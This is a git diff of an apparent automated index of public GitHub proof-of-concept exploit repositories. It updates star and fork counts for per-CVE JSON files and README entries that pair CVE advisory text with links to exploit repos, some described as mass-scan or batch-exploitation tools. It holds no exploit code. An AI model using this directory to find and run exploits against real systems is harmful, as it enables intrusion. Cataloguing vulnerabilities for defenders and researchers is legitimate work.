"redteam",
|
||||
"redteaming",
|
||||
"vulnerability",
|
||||
"xss",
|
||||
"zeroday"
|
||||
],
|
||||
"visibility": "public",
|
||||
"forks": 23,
|
||||
"watchers": 109,
|
||||
"score": 0,
|
||||
"subscribers_count": 3
|
||||
}
|
||||
]
|
|
@ -1,32 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 452399615,
|
||||
"name": "CVE-2022-23967",
|
||||
"full_name": "MaherAzzouzi\/CVE-2022-23967",
|
||||
"owner": {
|
||||
"login": "MaherAzzouzi",
|
||||
"id": 62230190,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4",
|
||||
"html_url": "https:\/\/github.com\/MaherAzzouzi"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-23967",
|
||||
"description": "TightVNC Vulnerability.",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-26T18:49:43Z",
|
||||
"updated_at": "2023-04-05T13:06:51Z",
|
||||
"pushed_at": "2022-01-26T18:53:03Z",
|
||||
"stargazers_count": 16,
|
||||
"watchers_count": 16,
|
||||
"has_discussions": false,
|
||||
"forks_count": 3,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 3,
|
||||
"watchers": 16,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
}
|
||||
]
|
|
@ -78,13 +78,13 @@
|
|||
"stargazers_count": 2,
|
||||
"watchers_count": 2,
|
||||
"has_discussions": false,
|
||||
"forks_count": 2,
|
||||
"forks_count": 1,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 2,
|
||||
"forks": 1,
|
||||
"watchers": 2,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
|
|
|
@ -13,10 +13,10 @@
|
|||
"description": "【懒人神器】一款图形化、批量采集url、批量对采集的url进行各种nday检测的工具。可用于src挖掘、cnvd挖掘、0day利用、打造自己的武器库等场景。可以批量利用Actively Exploited Atlassian Confluence 0Day CVE-2022-26134和DedeCMS v5.7.87 SQL注入 CVE-2022-23337。",
|
||||
"fork": false,
|
||||
"created_at": "2022-05-31T07:44:01Z",
|
||||
"updated_at": "2023-08-24T06:03:32Z",
|
||||
"updated_at": "2023-08-24T13:27:53Z",
|
||||
"pushed_at": "2023-02-26T14:06:05Z",
|
||||
"stargazers_count": 1028,
|
||||
"watchers_count": 1028,
|
||||
"stargazers_count": 1027,
|
||||
"watchers_count": 1027,
|
||||
"has_discussions": true,
|
||||
"forks_count": 181,
|
||||
"allow_forking": true,
|
||||
|
@ -45,7 +45,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 181,
|
||||
"watchers": 1028,
|
||||
"watchers": 1027,
|
||||
"score": 0,
|
||||
"subscribers_count": 17
|
||||
},
|
||||
|
|
|
@ -13,10 +13,10 @@
|
|||
"description": "Tp-Link Archer AX50 Authenticated RCE (CVE-2022-30075)",
|
||||
"fork": false,
|
||||
"created_at": "2022-06-07T23:26:47Z",
|
||||
"updated_at": "2023-06-03T21:32:41Z",
|
||||
"updated_at": "2023-08-24T11:43:42Z",
|
||||
"pushed_at": "2022-11-20T03:03:53Z",
|
||||
"stargazers_count": 200,
|
||||
"watchers_count": 200,
|
||||
"stargazers_count": 199,
|
||||
"watchers_count": 199,
|
||||
"has_discussions": false,
|
||||
"forks_count": 49,
|
||||
"allow_forking": true,
|
||||
|
@ -25,7 +25,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 49,
|
||||
"watchers": 200,
|
||||
"watchers": 199,
|
||||
"score": 0,
|
||||
"subscribers_count": 3
|
||||
},
|
||||
|
|
|
@ -13,10 +13,10 @@
|
|||
"description": "User can execute unsigned binaries with BootROM privileges, which can be used to unlock bootloader",
|
||||
"fork": false,
|
||||
"created_at": "2023-06-10T08:31:26Z",
|
||||
"updated_at": "2023-08-23T02:55:25Z",
|
||||
"updated_at": "2023-08-24T11:12:26Z",
|
||||
"pushed_at": "2023-08-23T07:21:09Z",
|
||||
"stargazers_count": 55,
|
||||
"watchers_count": 55,
|
||||
"stargazers_count": 56,
|
||||
"watchers_count": 56,
|
||||
"has_discussions": false,
|
||||
"forks_count": 11,
|
||||
"allow_forking": true,
|
||||
|
@ -28,7 +28,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 11,
|
||||
"watchers": 55,
|
||||
"watchers": 56,
|
||||
"score": 0,
|
||||
"subscribers_count": 3
|
||||
}
|
||||
|
|
|
@ -47,10 +47,10 @@
|
|||
"description": "POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon",
|
||||
"fork": false,
|
||||
"created_at": "2023-02-23T10:04:58Z",
|
||||
"updated_at": "2023-08-23T10:35:21Z",
|
||||
"updated_at": "2023-08-24T12:50:16Z",
|
||||
"pushed_at": "2023-03-14T08:41:51Z",
|
||||
"stargazers_count": 99,
|
||||
"watchers_count": 99,
|
||||
"stargazers_count": 100,
|
||||
"watchers_count": 100,
|
||||
"has_discussions": false,
|
||||
"forks_count": 27,
|
||||
"allow_forking": true,
|
||||
|
@ -59,7 +59,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 27,
|
||||
"watchers": 99,
|
||||
"watchers": 100,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
|
|
|
@ -1274,7 +1274,7 @@
|
|||
"fork": false,
|
||||
"created_at": "2023-04-21T08:15:19Z",
|
||||
"updated_at": "2023-05-05T13:36:18Z",
|
||||
"pushed_at": "2023-08-20T12:59:20Z",
|
||||
"pushed_at": "2023-08-24T07:10:21Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
|
|
|
@ -18,13 +18,13 @@
|
|||
"stargazers_count": 36,
|
||||
"watchers_count": 36,
|
||||
"has_discussions": false,
|
||||
"forks_count": 5,
|
||||
"forks_count": 6,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 5,
|
||||
"forks": 6,
|
||||
"watchers": 36,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
"description": "PowerShell script to apply Zenbleed (CVE-2023-20593) MSR workaround on Windows",
|
||||
"fork": false,
|
||||
"created_at": "2023-07-26T20:03:11Z",
|
||||
"updated_at": "2023-08-09T01:21:40Z",
|
||||
"updated_at": "2023-08-24T10:02:16Z",
|
||||
"pushed_at": "2023-07-31T09:21:45Z",
|
||||
"stargazers_count": 7,
|
||||
"watchers_count": 7,
|
||||
|
|
|
@ -13,12 +13,12 @@
|
|||
"description": "Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit",
|
||||
"fork": false,
|
||||
"created_at": "2023-01-30T12:57:48Z",
|
||||
"updated_at": "2023-08-13T07:27:41Z",
|
||||
"updated_at": "2023-08-24T07:09:38Z",
|
||||
"pushed_at": "2023-02-27T04:51:20Z",
|
||||
"stargazers_count": 241,
|
||||
"watchers_count": 241,
|
||||
"stargazers_count": 242,
|
||||
"watchers_count": 242,
|
||||
"has_discussions": false,
|
||||
"forks_count": 55,
|
||||
"forks_count": 56,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
|
@ -34,8 +34,8 @@
|
|||
"use-after-free"
|
||||
],
|
||||
"visibility": "public",
|
||||
"forks": 55,
|
||||
"watchers": 241,
|
||||
"forks": 56,
|
||||
"watchers": 242,
|
||||
"score": 0,
|
||||
"subscribers_count": 5
|
||||
},
|
||||
|
|
|
@ -413,10 +413,10 @@
|
|||
"description": "Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email.",
|
||||
"fork": false,
|
||||
"created_at": "2023-03-20T16:31:54Z",
|
||||
"updated_at": "2023-08-23T13:38:56Z",
|
||||
"updated_at": "2023-08-24T09:06:31Z",
|
||||
"pushed_at": "2023-03-24T10:46:38Z",
|
||||
"stargazers_count": 94,
|
||||
"watchers_count": 94,
|
||||
"stargazers_count": 95,
|
||||
"watchers_count": 95,
|
||||
"has_discussions": false,
|
||||
"forks_count": 24,
|
||||
"allow_forking": true,
|
||||
|
@ -427,7 +427,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 24,
|
||||
"watchers": 94,
|
||||
"watchers": 95,
|
||||
"score": 0,
|
||||
"subscribers_count": 4
|
||||
},
|
||||
|
|
|
@ -73,10 +73,10 @@
|
|||
"description": "OpenSSH 9.1 vulnerability mass scan and exploit",
|
||||
"fork": false,
|
||||
"created_at": "2023-02-22T19:44:08Z",
|
||||
"updated_at": "2023-08-23T22:19:12Z",
|
||||
"updated_at": "2023-08-24T11:52:04Z",
|
||||
"pushed_at": "2023-03-07T10:43:36Z",
|
||||
"stargazers_count": 104,
|
||||
"watchers_count": 104,
|
||||
"stargazers_count": 105,
|
||||
"watchers_count": 105,
|
||||
"has_discussions": false,
|
||||
"forks_count": 23,
|
||||
"allow_forking": true,
|
||||
|
@ -85,7 +85,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 23,
|
||||
"watchers": 104,
|
||||
"watchers": 105,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
},
|
||||
|
|
|
@ -43,10 +43,10 @@
|
|||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2023-04-21T20:13:47Z",
|
||||
"updated_at": "2023-08-04T10:43:48Z",
|
||||
"updated_at": "2023-08-24T12:36:41Z",
|
||||
"pushed_at": "2023-04-22T22:25:00Z",
|
||||
"stargazers_count": 8,
|
||||
"watchers_count": 8,
|
||||
"stargazers_count": 9,
|
||||
"watchers_count": 9,
|
||||
"has_discussions": false,
|
||||
"forks_count": 4,
|
||||
"allow_forking": true,
|
||||
|
@ -55,7 +55,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 4,
|
||||
"watchers": 8,
|
||||
"watchers": 9,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
|
@ -73,10 +73,10 @@
|
|||
"description": "Proof of Concept Exploit for PaperCut CVE-2023-27350",
|
||||
"fork": false,
|
||||
"created_at": "2023-04-22T21:34:06Z",
|
||||
"updated_at": "2023-08-20T17:38:26Z",
|
||||
"updated_at": "2023-08-24T11:52:23Z",
|
||||
"pushed_at": "2023-05-01T19:31:20Z",
|
||||
"stargazers_count": 41,
|
||||
"watchers_count": 41,
|
||||
"stargazers_count": 42,
|
||||
"watchers_count": 42,
|
||||
"has_discussions": false,
|
||||
"forks_count": 17,
|
||||
"allow_forking": true,
|
||||
|
@ -85,7 +85,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 17,
|
||||
"watchers": 41,
|
||||
"watchers": 42,
|
||||
"score": 0,
|
||||
"subscribers_count": 5
|
||||
},
|
||||
|
|
|
@ -13,10 +13,10 @@
|
|||
"description": "GitLab CVE-2023-2825 PoC. This PoC leverages a path traversal vulnerability to retrieve the \/etc\/passwd file from a system running GitLab 16.0.0.",
|
||||
"fork": false,
|
||||
"created_at": "2023-05-25T13:25:10Z",
|
||||
"updated_at": "2023-08-11T23:10:31Z",
|
||||
"updated_at": "2023-08-24T11:52:30Z",
|
||||
"pushed_at": "2023-06-02T12:10:06Z",
|
||||
"stargazers_count": 137,
|
||||
"watchers_count": 137,
|
||||
"stargazers_count": 138,
|
||||
"watchers_count": 138,
|
||||
"has_discussions": false,
|
||||
"forks_count": 31,
|
||||
"allow_forking": true,
|
||||
|
@ -28,7 +28,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 31,
|
||||
"watchers": 137,
|
||||
"watchers": 138,
|
||||
"score": 0,
|
||||
"subscribers_count": 4
|
||||
},
|
||||
|
|
|
@ -103,10 +103,10 @@
|
|||
"description": "Openfire Console Authentication Bypass Vulnerability with RCE plugin",
|
||||
"fork": false,
|
||||
"created_at": "2023-06-18T15:42:00Z",
|
||||
"updated_at": "2023-08-23T20:44:26Z",
|
||||
"updated_at": "2023-08-24T07:03:53Z",
|
||||
"pushed_at": "2023-06-19T04:42:56Z",
|
||||
"stargazers_count": 6,
|
||||
"watchers_count": 6,
|
||||
"stargazers_count": 7,
|
||||
"watchers_count": 7,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1,
|
||||
"allow_forking": true,
|
||||
|
@ -115,7 +115,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 1,
|
||||
"watchers": 6,
|
||||
"watchers": 7,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
|
|
|
@ -13,10 +13,10 @@
|
|||
"description": "CVE-2023-3269: Linux kernel privilege escalation vulnerability",
|
||||
"fork": false,
|
||||
"created_at": "2023-06-28T13:22:26Z",
|
||||
"updated_at": "2023-08-24T02:36:25Z",
|
||||
"updated_at": "2023-08-24T08:03:40Z",
|
||||
"pushed_at": "2023-07-28T13:20:45Z",
|
||||
"stargazers_count": 404,
|
||||
"watchers_count": 404,
|
||||
"stargazers_count": 403,
|
||||
"watchers_count": 403,
|
||||
"has_discussions": false,
|
||||
"forks_count": 41,
|
||||
"allow_forking": true,
|
||||
|
@ -25,7 +25,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 41,
|
||||
"watchers": 404,
|
||||
"watchers": 403,
|
||||
"score": 0,
|
||||
"subscribers_count": 18
|
||||
}
|
||||
|
|
|
@ -13,10 +13,10 @@
|
|||
"description": "Original PoC for CVE-2023-32784",
|
||||
"fork": false,
|
||||
"created_at": "2023-05-01T17:08:55Z",
|
||||
"updated_at": "2023-08-23T22:31:06Z",
|
||||
"updated_at": "2023-08-24T09:04:21Z",
|
||||
"pushed_at": "2023-08-17T19:26:55Z",
|
||||
"stargazers_count": 527,
|
||||
"watchers_count": 527,
|
||||
"stargazers_count": 528,
|
||||
"watchers_count": 528,
|
||||
"has_discussions": false,
|
||||
"forks_count": 43,
|
||||
"allow_forking": true,
|
||||
|
@ -28,7 +28,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 43,
|
||||
"watchers": 527,
|
||||
"watchers": 528,
|
||||
"score": 0,
|
||||
"subscribers_count": 10
|
||||
},
|
||||
|
|
|
@ -43,10 +43,10 @@
|
|||
"description": "MOVEit CVE-2023-34362",
|
||||
"fork": false,
|
||||
"created_at": "2023-06-09T19:07:32Z",
|
||||
"updated_at": "2023-08-22T20:00:09Z",
|
||||
"updated_at": "2023-08-24T09:44:55Z",
|
||||
"pushed_at": "2023-06-26T20:24:32Z",
|
||||
"stargazers_count": 114,
|
||||
"watchers_count": 114,
|
||||
"stargazers_count": 115,
|
||||
"watchers_count": 115,
|
||||
"has_discussions": false,
|
||||
"forks_count": 28,
|
||||
"allow_forking": true,
|
||||
|
@ -55,7 +55,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 28,
|
||||
"watchers": 114,
|
||||
"watchers": 115,
|
||||
"score": 0,
|
||||
"subscribers_count": 5
|
||||
},
|
||||
|
|
|
@ -13,10 +13,10 @@
|
|||
"description": "CVE-2023-36874 PoC",
|
||||
"fork": false,
|
||||
"created_at": "2023-08-20T13:50:42Z",
|
||||
"updated_at": "2023-08-24T02:39:07Z",
|
||||
"updated_at": "2023-08-24T09:24:14Z",
|
||||
"pushed_at": "2023-08-20T13:54:15Z",
|
||||
"stargazers_count": 58,
|
||||
"watchers_count": 58,
|
||||
"stargazers_count": 60,
|
||||
"watchers_count": 60,
|
||||
"has_discussions": false,
|
||||
"forks_count": 24,
|
||||
"allow_forking": true,
|
||||
|
@ -25,7 +25,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 24,
|
||||
"watchers": 58,
|
||||
"watchers": 60,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
|
@ -73,19 +73,19 @@
|
|||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2023-08-23T12:07:40Z",
|
||||
"updated_at": "2023-08-24T06:30:09Z",
|
||||
"updated_at": "2023-08-24T13:48:16Z",
|
||||
"pushed_at": "2023-08-23T16:46:53Z",
|
||||
"stargazers_count": 67,
|
||||
"watchers_count": 67,
|
||||
"stargazers_count": 87,
|
||||
"watchers_count": 87,
|
||||
"has_discussions": false,
|
||||
"forks_count": 25,
|
||||
"forks_count": 26,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 25,
|
||||
"watchers": 67,
|
||||
"forks": 26,
|
||||
"watchers": 87,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
}
|
||||
|
|
32
2023/CVE-2023-38035.json
Normal file
32
2023/CVE-2023-38035.json
Normal file
|
@ -0,0 +1,32 @@
|
|||
[
|
||||
{
|
||||
"id": 682214979,
|
||||
"name": "CVE-2023-38035",
|
||||
"full_name": "horizon3ai\/CVE-2023-38035",
|
||||
"owner": {
|
||||
"login": "horizon3ai",
|
||||
"id": 79593994,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
|
||||
"html_url": "https:\/\/github.com\/horizon3ai"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-38035",
|
||||
"description": "Ivanti Sentry CVE-2023-38035",
|
||||
"fork": false,
|
||||
"created_at": "2023-08-23T17:34:36Z",
|
||||
"updated_at": "2023-08-24T13:34:45Z",
|
||||
"pushed_at": "2023-08-23T18:42:37Z",
|
||||
"stargazers_count": 2,
|
||||
"watchers_count": 2,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 2,
|
||||
"score": 0,
|
||||
"subscribers_count": 0
|
||||
}
|
||||
]
|
128
README.md
128
README.md
|
@ -2715,6 +2715,13 @@
|
|||
- [d0rb/CVE-2023-37979](https://github.com/d0rb/CVE-2023-37979)
|
||||
- [codeb0ss/CVE-2023-37979](https://github.com/codeb0ss/CVE-2023-37979)
|
||||
|
||||
### CVE-2023-38035 (2023-08-21)
|
||||
|
||||
<code>A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
|
||||
</code>
|
||||
|
||||
- [horizon3ai/CVE-2023-38035](https://github.com/horizon3ai/CVE-2023-38035)
|
||||
|
||||
### CVE-2023-38408 (2023-07-19)
|
||||
|
||||
<code>The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.
|
||||
|
@ -2872,28 +2879,11 @@
|
|||
</code>
|
||||
|
||||
- [Crusaders-of-Rust/CVE-2022-0185](https://github.com/Crusaders-of-Rust/CVE-2022-0185)
|
||||
- [discordianfish/cve-2022-0185-crash-poc](https://github.com/discordianfish/cve-2022-0185-crash-poc)
|
||||
- [khaclep007/CVE-2022-0185](https://github.com/khaclep007/CVE-2022-0185)
|
||||
- [chenaotian/CVE-2022-0185](https://github.com/chenaotian/CVE-2022-0185)
|
||||
- [shahparkhan/cve-2022-0185](https://github.com/shahparkhan/cve-2022-0185)
|
||||
- [veritas501/CVE-2022-0185-PipeVersion](https://github.com/veritas501/CVE-2022-0185-PipeVersion)
|
||||
- [featherL/CVE-2022-0185-exploit](https://github.com/featherL/CVE-2022-0185-exploit)
|
||||
|
||||
### CVE-2022-0219 (2022-01-20)
|
||||
|
||||
<code>Improper Restriction of XML External Entity Reference in GitHub repository skylot/jadx prior to 1.3.2.
|
||||
</code>
|
||||
|
||||
- [Haxatron/CVE-2022-0219](https://github.com/Haxatron/CVE-2022-0219)
|
||||
|
||||
### CVE-2022-0236 (2022-01-18)
|
||||
|
||||
<code>The WP Import Export WordPress plugin (both free and premium versions) is vulnerable to unauthenticated sensitive data disclosure due to a missing capability check on the download function wpie_process_file_download found in the ~/includes/classes/class-wpie-general.php file. This made it possible for unauthenticated attackers to download any imported or exported information from a vulnerable site which can contain sensitive information like user data. This affects versions up to, and including, 3.9.15.
|
||||
</code>
|
||||
|
||||
- [qurbat/CVE-2022-0236](https://github.com/qurbat/CVE-2022-0236)
|
||||
- [xiska62314/CVE-2022-0236](https://github.com/xiska62314/CVE-2022-0236)
|
||||
|
||||
### CVE-2022-0265 (2022-03-03)
|
||||
|
||||
<code>Improper Restriction of XML External Entity Reference in GitHub repository hazelcast/hazelcast in 5.1-BETA-1.
|
||||
|
@ -2908,13 +2898,6 @@
|
|||
|
||||
- [KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit](https://github.com/KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit)
|
||||
|
||||
### CVE-2022-0332 (2022-01-25)
|
||||
|
||||
<code>A flaw was found in Moodle in versions 3.11 to 3.11.4. An SQL injection risk was identified in the h5p activity web service responsible for fetching user attempt data.
|
||||
</code>
|
||||
|
||||
- [numanturle/CVE-2022-0332](https://github.com/numanturle/CVE-2022-0332)
|
||||
|
||||
### CVE-2022-0337 (2023-01-02)
|
||||
|
||||
<code>Inappropriate implementation in File System API in Google Chrome on Windows prior to 97.0.4692.71 allowed a remote attacker to obtain potentially sensitive information via a crafted HTML page. (Chrome security severity: High)
|
||||
|
@ -4026,15 +4009,6 @@
|
|||
|
||||
- [sumeetIT/CVE-2022-20607](https://github.com/sumeetIT/CVE-2022-20607)
|
||||
|
||||
### CVE-2022-20699 (2022-02-10)
|
||||
|
||||
<code>Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
|
||||
</code>
|
||||
|
||||
- [Audiobahn/CVE-2022-20699](https://github.com/Audiobahn/CVE-2022-20699)
|
||||
- [puckiestyle/CVE-2022-20699](https://github.com/puckiestyle/CVE-2022-20699)
|
||||
- [rohankumardubey/CVE-2022-20699](https://github.com/rohankumardubey/CVE-2022-20699)
|
||||
|
||||
### CVE-2022-20829 (2022-06-24)
|
||||
|
||||
<code>A vulnerability in the packaging of Cisco Adaptive Security Device Manager (ASDM) images and the validation of those images by Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker with administrative privileges to upload an ASDM image that contains malicious code to a device that is running Cisco ASA Software. This vulnerability is due to insufficient validation of the authenticity of an ASDM image during its installation on a device that is running Cisco ASA Software. An attacker could exploit this vulnerability by installing a crafted ASDM image on the device that is running Cisco ASA Software and then waiting for a targeted user to access that device using ASDM. A successful exploit could allow the attacker to execute arbitrary code on the machine of the targeted user with the privileges of that user on that machine. Notes: To successfully exploit this vulnerability, the attacker must have administrative privileges on the device that is running Cisco ASA Software. Potential targets are limited to users who manage the same device that is running Cisco ASA Software using ASDM. Cisco has released and will release software updates that address this vulnerability.
|
||||
|
@ -4049,13 +4023,6 @@
|
|||
|
||||
- [CiscoPSIRT/CVE-2022-20866](https://github.com/CiscoPSIRT/CVE-2022-20866)
|
||||
|
||||
### CVE-2022-21241 (2022-02-08)
|
||||
|
||||
<code>Cross-site scripting vulnerability in CSV+ prior to 0.8.1 allows a remote unauthenticated attacker to inject an arbitrary script or an arbitrary OS command via a specially crafted CSV file that contains HTML a tag.
|
||||
</code>
|
||||
|
||||
- [satoki/csv-plus_vulnerability](https://github.com/satoki/csv-plus_vulnerability)
|
||||
|
||||
### CVE-2022-21306 (2022-01-19)
|
||||
|
||||
<code>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
|
||||
|
@ -4068,7 +4035,6 @@
|
|||
<code>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
|
||||
</code>
|
||||
|
||||
- [Mr-xn/CVE-2022-21371](https://github.com/Mr-xn/CVE-2022-21371)
|
||||
- [Vulnmachines/Oracle-WebLogic-CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371)
|
||||
|
||||
### CVE-2022-21445 (2022-04-19)
|
||||
|
@ -4102,19 +4068,11 @@
|
|||
- [rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit](https://github.com/rockmelodies/Oracle-E-BS-CVE-2022-21587-Exploit)
|
||||
- [sahabrifki/CVE-2022-21587-Oracle-EBS-](https://github.com/sahabrifki/CVE-2022-21587-Oracle-EBS-)
|
||||
|
||||
### CVE-2022-21658 (2022-01-20)
|
||||
|
||||
<code>Rust is a multi-paradigm, general-purpose programming language designed for performance and safety, especially safe concurrency. The Rust Security Response WG was notified that the `std::fs::remove_dir_all` standard library function is vulnerable a race condition enabling symlink following (CWE-363). An attacker could use this security issue to trick a privileged program into deleting files and directories the attacker couldn't otherwise access or delete. Rust 1.0.0 through Rust 1.58.0 is affected by this vulnerability with 1.58.1 containing a patch. Note that the following build targets don't have usable APIs to properly mitigate the attack, and are thus still vulnerable even with a patched toolchain: macOS before version 10.10 (Yosemite) and REDOX. We recommend everyone to update to Rust 1.58.1 as soon as possible, especially people developing programs expected to run in privileged contexts (including system daemons and setuid binaries), as those have the highest risk of being affected by this. Note that adding checks in your codebase before calling remove_dir_all will not mitigate the vulnerability, as they would also be vulnerable to race conditions like remove_dir_all itself. The existing mitigation is working as intended outside of race conditions.
|
||||
</code>
|
||||
|
||||
- [sagittarius-a/cve-2022-21658](https://github.com/sagittarius-a/cve-2022-21658)
|
||||
|
||||
### CVE-2022-21660 (2022-02-09)
|
||||
|
||||
<code>Gin-vue-admin is a backstage management system based on vue and gin. In versions prior to 2.4.7 low privilege users are able to modify higher privilege users. Authentication is missing on the `setUserInfo` function. Users are advised to update as soon as possible. There are no known workarounds.
|
||||
</code>
|
||||
|
||||
- [UzJu/Gin-Vue-admin-poc-CVE-2022-21660](https://github.com/UzJu/Gin-Vue-admin-poc-CVE-2022-21660)
|
||||
- [UzJu/CVE-2022-21660](https://github.com/UzJu/CVE-2022-21660)
|
||||
|
||||
### CVE-2022-21661 (2022-01-06)
|
||||
|
@ -4160,13 +4118,6 @@
|
|||
|
||||
- [lolin19/CVE-2022-21839-](https://github.com/lolin19/CVE-2022-21839-)
|
||||
|
||||
### CVE-2022-21877 (2022-01-11)
|
||||
|
||||
<code>Storage Spaces Controller Information Disclosure Vulnerability.
|
||||
</code>
|
||||
|
||||
- [Big5-sec/cve-2022-21877](https://github.com/Big5-sec/cve-2022-21877)
|
||||
|
||||
### CVE-2022-21881 (2022-01-11)
|
||||
|
||||
<code>Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21879.
|
||||
|
@ -4179,11 +4130,6 @@
|
|||
<code>Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21887.
|
||||
</code>
|
||||
|
||||
- [KaLendsi/CVE-2022-21882](https://github.com/KaLendsi/CVE-2022-21882)
|
||||
- [David-Honisch/CVE-2022-21882](https://github.com/David-Honisch/CVE-2022-21882)
|
||||
- [L4ys/CVE-2022-21882](https://github.com/L4ys/CVE-2022-21882)
|
||||
- [sailay1996/cve-2022-21882-poc](https://github.com/sailay1996/cve-2022-21882-poc)
|
||||
- [r1l4-i3pur1l4/CVE-2022-21882](https://github.com/r1l4-i3pur1l4/CVE-2022-21882)
|
||||
- [dishfwk/CVE-2022-21882](https://github.com/dishfwk/CVE-2022-21882)
|
||||
|
||||
### CVE-2022-21894 (2022-01-11)
|
||||
|
@ -4202,12 +4148,8 @@
|
|||
<code>HTTP Protocol Stack Remote Code Execution Vulnerability.
|
||||
</code>
|
||||
|
||||
- [corelight/cve-2022-21907](https://github.com/corelight/cve-2022-21907)
|
||||
- [mauricelambert/CVE-2022-21907](https://github.com/mauricelambert/CVE-2022-21907)
|
||||
- [ZZ-SOCMAP/CVE-2022-21907](https://github.com/ZZ-SOCMAP/CVE-2022-21907)
|
||||
- [xiska62314/CVE-2022-21907](https://github.com/xiska62314/CVE-2022-21907)
|
||||
- [p0dalirius/CVE-2022-21907-http.sys](https://github.com/p0dalirius/CVE-2022-21907-http.sys)
|
||||
